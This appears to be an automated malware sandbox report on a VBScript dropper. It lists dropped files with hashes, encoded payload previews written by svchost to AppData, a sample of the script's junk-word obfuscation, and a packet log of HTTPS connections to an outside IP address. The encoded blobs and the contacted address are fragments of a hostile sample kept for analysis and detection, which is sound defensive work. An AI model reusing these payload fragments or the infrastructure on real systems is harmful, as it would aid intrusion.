                                                      Preview:....Pericholangitisdogberries = Timer....'Gentilesse fdselshjlperen ungreat..'Celletypes genforhandlede opklbede nedsivningsbekendtgrelser..'Hemoglobulin, ansatsstykke, indsigelsers, involute tvetydighedernes..'unscrutinisingly convener48 cbabbage rakkeris250 tvangsfuldbyrdedes!..'Trks removable sdebadenes..'Stimuloir porno! nonenlightened53 sulken139; blomster...'Stiftsfrknernes. ehlite unobserving plumule..'Protonemata afmalingers razzed thrashes..'Cappuccinoens albuminizes genopstaaet indrapporteres33..'Adresseliniernes takhtadjy kulturministrene legitimationernes catlap!..'haabloest! sammenbygge semihobos buzzsaws vexil..'truller, riftless. micrograph52 rundeste..'Udpolstrers photomicrographical..'Firmalogo transcend..'Respektfuldere understellene omvurderings gunline plissau;..'Muzziest balsameringens udoedelig afforest140..'Mellemnavn skrkkampagnes, eulogizations, balboa indkasseringerne?..'Norss trochart notabilitets...'Kanalsyet liniediagrammers,..'Sideskiftene blodtilfrsel syn

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkr3sefb.x45.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4keat5i.xgu.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_slezu0lo.fen.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_trqnp25z.kyi.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uzilty0j.crj.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3kd1gs3.h0c.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Roaming\BIT6A10.tmp

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):429872
                                                      Entropy (8bit):5.976851969349054
                                                      Encrypted:false
                                                      SSDEEP:6144:t/W8r4vs3ivTt8oFfHgXaoQ9/RoE4tiB5jLFYrPp+YzkT6nMUMJPzGW/1gRH:t1rgdaotHOnQJRoWLWrPpMONMBzGy1gZ
                                                      MD5:08592DB9D8ED3B5E0376FB735D36CA36
                                                      SHA1:39776FD91D9617E7112AAEC2A43BB7E51D06B336
                                                      SHA-256:463C92C14E5B68211DC0917B0AE9823A1AE326B79A8D74BDF87DA5AE0A606E11
                                                      SHA-512:BF02F3219A3D9770952138BED8DAEA15737AE57D1DDC1068792E584171EE9ECA43636055F2028873CAA4FB18C6316F933CF23B44736A9F7960316C8C67BEF504
                                                      Malicious:false
                                                      Preview:cQGb6wL/mLs5nRsAcQGbcQGbA1wkBHEBm+sCfyy57WofVXEBm+sCLwWB8bzh/mHrAgmXcQGbgcGvdB7L6wIAZ+sCQSbrAo7QcQGbumAhBwxxAZvrAmn6cQGbcQGbMcrrAjDf6wJjRokUC3EBm3EBm9Hi6wLo3XEBm4PBBHEBm3EBm4H5h2VnBHzNcQGb6wKnc4tEJARxAZtxAZuJw3EBm+sCsymBwzPVngLrAumOcQGbujv2QwDrAtNwcQGbgfKHctBmcQGbcQGbgfK8hJNmcQGbcQGb6wKLUHEBm3EBm3EBm4sMEOsCO+5xAZuJDBNxAZvrAnWmQusCoLzrAmcCgfrUhwQAddVxAZtxAZuJXCQMcQGb6wK3coHtAAMAAOsC0QzrApI1i1QkCOsCosdxAZuLfCQE6wLMWOsCBxCJ6+sCa9vrAvakgcOcAAAAcQGb6wInfFPrAk2PcQGbakBxAZvrAmBIietxAZvrAg8Cx4MAAQAAABCGBHEBm3EBm4HDAAEAAHEBm3EBm1PrAqmUcQGbietxAZvrAkEQibsEAQAAcQGbcQGbgcMEAQAAcQGbcQGbU3EBm+sC+Xhq/3EBm3EBm4PCBXEBm3EBmzH26wJpj+sCihYxyXEBm3EBm4sa6wKRRXEBm0FxAZtxAZs5HAp19HEBm3EBm0brApOzcQGbgHwK+7h13+sCIkBxAZuLRAr8cQGb6wIb9SnwcQGb6wJi5v/ScQGbcQGbutSHBABxAZtxAZsxwHEBm3EBm4t8JAxxAZvrAj21gTQHoPHtZusCtjjrAlbpg8AE6wIPP+sCuoc50HXi6wI5wnEBm4n7cQGbcQGb/9frAsCU6wIiGCkUbIrt5P9lITWgdLLyuO9FSGTnP+tsl04JMgohAPW9jU9sj8dTgK7GyD6h5PztRu0C1OfU/O1IyTbkX2NwgWugZz00TXCZa6CJvofiyS+RZksZS7d4UFmi8e2RYkWhY+BOgqK03WmTIQYhs6qi

                                                      C:\Users\user\AppData\Roaming\BIT8D77.tmp

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):429872
                                                      Entropy (8bit):5.976851969349054
                                                      Encrypted:false
                                                      SSDEEP:6144:t/W8r4vs3ivTt8oFfHgXaoQ9/RoE4tiB5jLFYrPp+YzkT6nMUMJPzGW/1gRH:t1rgdaotHOnQJRoWLWrPpMONMBzGy1gZ
                                                      MD5:08592DB9D8ED3B5E0376FB735D36CA36
                                                      SHA1:39776FD91D9617E7112AAEC2A43BB7E51D06B336
                                                      SHA-256:463C92C14E5B68211DC0917B0AE9823A1AE326B79A8D74BDF87DA5AE0A606E11
                                                      SHA-512:BF02F3219A3D9770952138BED8DAEA15737AE57D1DDC1068792E584171EE9ECA43636055F2028873CAA4FB18C6316F933CF23B44736A9F7960316C8C67BEF504
                                                      Malicious:false
                                                      Preview:cQGb6wL/mLs5nRsAcQGbcQGbA1wkBHEBm+sCfyy57WofVXEBm+sCLwWB8bzh/mHrAgmXcQGbgcGvdB7L6wIAZ+sCQSbrAo7QcQGbumAhBwxxAZvrAmn6cQGbcQGbMcrrAjDf6wJjRokUC3EBm3EBm9Hi6wLo3XEBm4PBBHEBm3EBm4H5h2VnBHzNcQGb6wKnc4tEJARxAZtxAZuJw3EBm+sCsymBwzPVngLrAumOcQGbujv2QwDrAtNwcQGbgfKHctBmcQGbcQGbgfK8hJNmcQGbcQGb6wKLUHEBm3EBm3EBm4sMEOsCO+5xAZuJDBNxAZvrAnWmQusCoLzrAmcCgfrUhwQAddVxAZtxAZuJXCQMcQGb6wK3coHtAAMAAOsC0QzrApI1i1QkCOsCosdxAZuLfCQE6wLMWOsCBxCJ6+sCa9vrAvakgcOcAAAAcQGb6wInfFPrAk2PcQGbakBxAZvrAmBIietxAZvrAg8Cx4MAAQAAABCGBHEBm3EBm4HDAAEAAHEBm3EBm1PrAqmUcQGbietxAZvrAkEQibsEAQAAcQGbcQGbgcMEAQAAcQGbcQGbU3EBm+sC+Xhq/3EBm3EBm4PCBXEBm3EBmzH26wJpj+sCihYxyXEBm3EBm4sa6wKRRXEBm0FxAZtxAZs5HAp19HEBm3EBm0brApOzcQGbgHwK+7h13+sCIkBxAZuLRAr8cQGb6wIb9SnwcQGb6wJi5v/ScQGbcQGbutSHBABxAZtxAZsxwHEBm3EBm4t8JAxxAZvrAj21gTQHoPHtZusCtjjrAlbpg8AE6wIPP+sCuoc50HXi6wI5wnEBm4n7cQGbcQGb/9frAsCU6wIiGCkUbIrt5P9lITWgdLLyuO9FSGTnP+tsl04JMgohAPW9jU9sj8dTgK7GyD6h5PztRu0C1OfU/O1IyTbkX2NwgWugZz00TXCZa6CJvofiyS+RZksZS7d4UFmi8e2RYkWhY+BOgqK03WmTIQYhs6qi

                                                      C:\Users\user\AppData\Roaming\BIT8EE0.tmp

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):483156
                                                      Entropy (8bit):5.96824642487463
                                                      Encrypted:false
                                                      SSDEEP:12288:Ug73VdtMCUFk5/6C9tqoEgAeoszRYQFBmweXM:P/yCR5/Ntqo0ebzRzF
                                                      MD5:85472E36DFECBC7055E57085322D6D9C
                                                      SHA1:DDEBEF4F4BF736D9654F24C9B2FD4B061D2AB518
                                                      SHA-256:D96FBBCDD42668D00B3744D4258850A51AC9B01741D72EAB15624F5B50C0F458
                                                      SHA-512:5B61CC3D449D37C4F7840C3A94304192EF1272F964B2A6A9892317B645D1FF5C58AFEA4803119FC3A3534FB9E2CD1348463EEB2B60EBECCDA61171875AA4441F
                                                      Malicious:false
                                                      Preview:6wLmnnEBm7tG7wwA6wLIn3EBmwNcJATrAt0w6wKZZbkRn68H6wLhQusC8vWBwaJQjTlxAZvrAjQhgemz7zxB6wJwQ3EBm+sCFQTrAjrvurLqfbbrAuPk6wLFF+sCLZjrAnbOMcrrAm2w6wIh4IkUC+sCgkfrArQ60eJxAZtxAZuDwQTrAux+6wLG3oH5ekMAAXzIcQGb6wKD0ItEJATrAuRh6wK+ponD6wLj6esChwqBw/rwTQBxAZvrAs+WuoCqxk9xAZvrAnZ9gfKY3dqc6wIc2nEBm4HyGHcc0+sCYtdxAZvrAqkM6wJM3usC6rbrAkZaiwwQ6wKOIOsChA+JDBPrAqmacQGbQnEBm3EBm4H6DCQFAHXUcQGbcQGbiVwkDHEBm+sCjsSB7QADAADrAj3n6wLmbotUJAhxAZtxAZuLfCQE6wJRLesCIS+J6+sC8DvrAvebgcOcAAAAcQGb6wLVjlPrAiqY6wKpEGpAcQGbcQGbievrAkxvcQGbx4MAAQAAAEAQAXEBm3EBm4HDAAEAAOsCbglxAZtT6wIz+nEBm4nr6wIp2OsCgDWJuwQBAABxAZtxAZuBwwQBAADrAoyb6wKQTlNxAZvrAj3Lav/rArOF6wLr6IPCBesCddFxAZsx9usCSe7rAq60McnrAhZ4cQGbixrrAnnE6wKr+UHrAg476wIkmTkcCnXy6wJbIHEBm0ZxAZvrAkXfgHwK+7h13HEBm3EBm4tECvzrArm3cQGbKfBxAZvrAk+z/9JxAZvrArLaugwkBQDrAqWgcQGbMcBxAZtxAZuLfCQMcQGb6wJe3oE0BwtgX8xxAZtxAZuDwATrAsygcQGbOdB15XEBm3EBm4n7cQGb6wJoOf/X6wKCdesCCwGPutYpzOUrM/Sft+iNId55f5+gM719ZLaKzSsz9J9LNc8v3mF/n6AzQV2nJ0ef0rj0n6C5/FmOmYKF5nKhtHVN9bTSXHnhnqmlEZtN4k7LzeDljE36

                                                      C:\Users\user\AppData\Roaming\BITB0F0.tmp

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):483156
                                                      Entropy (8bit):5.96824642487463
                                                      Encrypted:false
                                                      SSDEEP:12288:Ug73VdtMCUFk5/6C9tqoEgAeoszRYQFBmweXM:P/yCR5/Ntqo0ebzRzF
                                                      MD5:85472E36DFECBC7055E57085322D6D9C
                                                      SHA1:DDEBEF4F4BF736D9654F24C9B2FD4B061D2AB518
                                                      SHA-256:D96FBBCDD42668D00B3744D4258850A51AC9B01741D72EAB15624F5B50C0F458
                                                      SHA-512:5B61CC3D449D37C4F7840C3A94304192EF1272F964B2A6A9892317B645D1FF5C58AFEA4803119FC3A3534FB9E2CD1348463EEB2B60EBECCDA61171875AA4441F
                                                      Malicious:false
                                                      Preview:6wLmnnEBm7tG7wwA6wLIn3EBmwNcJATrAt0w6wKZZbkRn68H6wLhQusC8vWBwaJQjTlxAZvrAjQhgemz7zxB6wJwQ3EBm+sCFQTrAjrvurLqfbbrAuPk6wLFF+sCLZjrAnbOMcrrAm2w6wIh4IkUC+sCgkfrArQ60eJxAZtxAZuDwQTrAux+6wLG3oH5ekMAAXzIcQGb6wKD0ItEJATrAuRh6wK+ponD6wLj6esChwqBw/rwTQBxAZvrAs+WuoCqxk9xAZvrAnZ9gfKY3dqc6wIc2nEBm4HyGHcc0+sCYtdxAZvrAqkM6wJM3usC6rbrAkZaiwwQ6wKOIOsChA+JDBPrAqmacQGbQnEBm3EBm4H6DCQFAHXUcQGbcQGbiVwkDHEBm+sCjsSB7QADAADrAj3n6wLmbotUJAhxAZtxAZuLfCQE6wJRLesCIS+J6+sC8DvrAvebgcOcAAAAcQGb6wLVjlPrAiqY6wKpEGpAcQGbcQGbievrAkxvcQGbx4MAAQAAAEAQAXEBm3EBm4HDAAEAAOsCbglxAZtT6wIz+nEBm4nr6wIp2OsCgDWJuwQBAABxAZtxAZuBwwQBAADrAoyb6wKQTlNxAZvrAj3Lav/rArOF6wLr6IPCBesCddFxAZsx9usCSe7rAq60McnrAhZ4cQGbixrrAnnE6wKr+UHrAg476wIkmTkcCnXy6wJbIHEBm0ZxAZvrAkXfgHwK+7h13HEBm3EBm4tECvzrArm3cQGbKfBxAZvrAk+z/9JxAZvrArLaugwkBQDrAqWgcQGbMcBxAZtxAZuLfCQMcQGb6wJe3oE0BwtgX8xxAZtxAZuDwATrAsygcQGbOdB15XEBm3EBm4n7cQGb6wJoOf/X6wKCdesCCwGPutYpzOUrM/Sft+iNId55f5+gM719ZLaKzSsz9J9LNc8v3mF/n6AzQV2nJ0ef0rj0n6C5/FmOmYKF5nKhtHVN9bTSXHnhnqmlEZtN4k7LzeDljE36

                                                      C:\Users\user\AppData\Roaming\Ototoxicity.Non (copy)

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):483156
                                                      Entropy (8bit):5.96824642487463
                                                      Encrypted:false
                                                      SSDEEP:12288:Ug73VdtMCUFk5/6C9tqoEgAeoszRYQFBmweXM:P/yCR5/Ntqo0ebzRzF
                                                      MD5:85472E36DFECBC7055E57085322D6D9C
                                                      SHA1:DDEBEF4F4BF736D9654F24C9B2FD4B061D2AB518
                                                      SHA-256:D96FBBCDD42668D00B3744D4258850A51AC9B01741D72EAB15624F5B50C0F458
                                                      SHA-512:5B61CC3D449D37C4F7840C3A94304192EF1272F964B2A6A9892317B645D1FF5C58AFEA4803119FC3A3534FB9E2CD1348463EEB2B60EBECCDA61171875AA4441F
                                                      Malicious:false
                                                      Preview:6wLmnnEBm7tG7wwA6wLIn3EBmwNcJATrAt0w6wKZZbkRn68H6wLhQusC8vWBwaJQjTlxAZvrAjQhgemz7zxB6wJwQ3EBm+sCFQTrAjrvurLqfbbrAuPk6wLFF+sCLZjrAnbOMcrrAm2w6wIh4IkUC+sCgkfrArQ60eJxAZtxAZuDwQTrAux+6wLG3oH5ekMAAXzIcQGb6wKD0ItEJATrAuRh6wK+ponD6wLj6esChwqBw/rwTQBxAZvrAs+WuoCqxk9xAZvrAnZ9gfKY3dqc6wIc2nEBm4HyGHcc0+sCYtdxAZvrAqkM6wJM3usC6rbrAkZaiwwQ6wKOIOsChA+JDBPrAqmacQGbQnEBm3EBm4H6DCQFAHXUcQGbcQGbiVwkDHEBm+sCjsSB7QADAADrAj3n6wLmbotUJAhxAZtxAZuLfCQE6wJRLesCIS+J6+sC8DvrAvebgcOcAAAAcQGb6wLVjlPrAiqY6wKpEGpAcQGbcQGbievrAkxvcQGbx4MAAQAAAEAQAXEBm3EBm4HDAAEAAOsCbglxAZtT6wIz+nEBm4nr6wIp2OsCgDWJuwQBAABxAZtxAZuBwwQBAADrAoyb6wKQTlNxAZvrAj3Lav/rArOF6wLr6IPCBesCddFxAZsx9usCSe7rAq60McnrAhZ4cQGbixrrAnnE6wKr+UHrAg476wIkmTkcCnXy6wJbIHEBm0ZxAZvrAkXfgHwK+7h13HEBm3EBm4tECvzrArm3cQGbKfBxAZvrAk+z/9JxAZvrArLaugwkBQDrAqWgcQGbMcBxAZtxAZuLfCQMcQGb6wJe3oE0BwtgX8xxAZtxAZuDwATrAsygcQGbOdB15XEBm3EBm4n7cQGb6wJoOf/X6wKCdesCCwGPutYpzOUrM/Sft+iNId55f5+gM719ZLaKzSsz9J9LNc8v3mF/n6AzQV2nJ0ef0rj0n6C5/FmOmYKF5nKhtHVN9bTSXHnhnqmlEZtN4k7LzeDljE36

                                                      Static File Info

                                                      General

                                                      File type:ASCII text, with CRLF line terminators
                                                      Entropy (8bit):5.110739505966945
                                                      TrID:
                                                        File name:BKGCONF-THD1914129-BKGCONF-THD1914129.vbs
                                                        File size:267'482 bytes
                                                        MD5:62362dc3fc9d67f81dd8bcd670e8c117
                                                        SHA1:c871994bee2042d4cac07220e283166c3f58aa3f
                                                        SHA256:e9144edc2096347981ed7ea94f6898cfd400918558cb0aba2f4edabbe472cf61
                                                        SHA512:016586ea1e4f81f8f1f9ce7a9080575e21678e56c2942bbcb010b3fe6625b69caaf8238719716a43890a8f3edc7f844c0392bf38f7ed6779eab6bceea6036d89
                                                        SSDEEP:6144:NnKtYtINI5Mk6fqMKYJwMHy0J4iwLwhB2UcJXkcY9CdLzHxYRvbFjtkMQhM4O/Jk:VqV3hlvXd4Iob
                                                        TLSH:CF44E6A3CF0A26190F8A2FC5AC61C95286FB41B531121479EEEDC7DDA183DACD2FC915
                                                        File Content Preview:....Pericholangitisdogberries = Timer....'Gentilesse fdselshjlperen ungreat..'Celletypes genforhandlede opklbede nedsivningsbekendtgrelser..'Hemoglobulin, ansatsstykke, indsigelsers, involute tvetydighedernes..'unscrutinisingly convener48 cbabbage rakkeri

                                                        File Icon

                                                        Icon Hash:68d69b8f86ab9a86

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 18, 2024 08:07:32.938461065 CET49732443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:32.938505888 CET4434973289.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:32.938746929 CET49732443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:32.940242052 CET49732443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:32.940257072 CET4434973289.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:33.329348087 CET4434973289.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:33.329442978 CET49732443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:33.339462996 CET49732443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:33.339476109 CET4434973289.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:33.340600014 CET4434973289.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:33.382443905 CET49732443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:33.395958900 CET49732443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:33.436239958 CET4434973289.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:33.690069914 CET4434973289.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:33.690232992 CET4434973289.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:33.690318108 CET49732443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:33.696137905 CET49732443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:33.696160078 CET4434973289.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:33.696190119 CET49732443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:33.696197033 CET4434973289.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:33.730814934 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:33.730865002 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:33.730935097 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:33.731290102 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:33.731306076 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.111258984 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.113168001 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:34.113203049 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.114433050 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:34.114438057 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.474667072 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.474716902 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.475229025 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:34.475251913 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.523093939 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:34.657285929 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.657321930 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.657551050 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:34.657749891 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.657814026 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.657862902 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:34.658516884 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.658885002 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:34.658893108 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.660511971 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:34.741372108 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.741935015 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:34.838942051 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.839198112 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:34.839339018 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.840076923 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.840133905 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:34.840152979 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.840238094 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:34.840650082 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.840694904 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:34.840707064 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.840737104 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:34.841636896 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.841691971 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:34.841701031 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.841770887 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:34.846710920 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:34.878030062 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.878254890 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:34.922416925 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:34.922594070 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.019587994 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.019671917 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.020035028 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.020118952 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.020440102 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.020518064 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.020802975 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.020894051 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.021506071 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.021608114 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.022106886 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.022176027 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.022589922 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.022659063 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.023324966 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.023406982 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.023830891 CET4434973389.40.227.248192.168.2.5
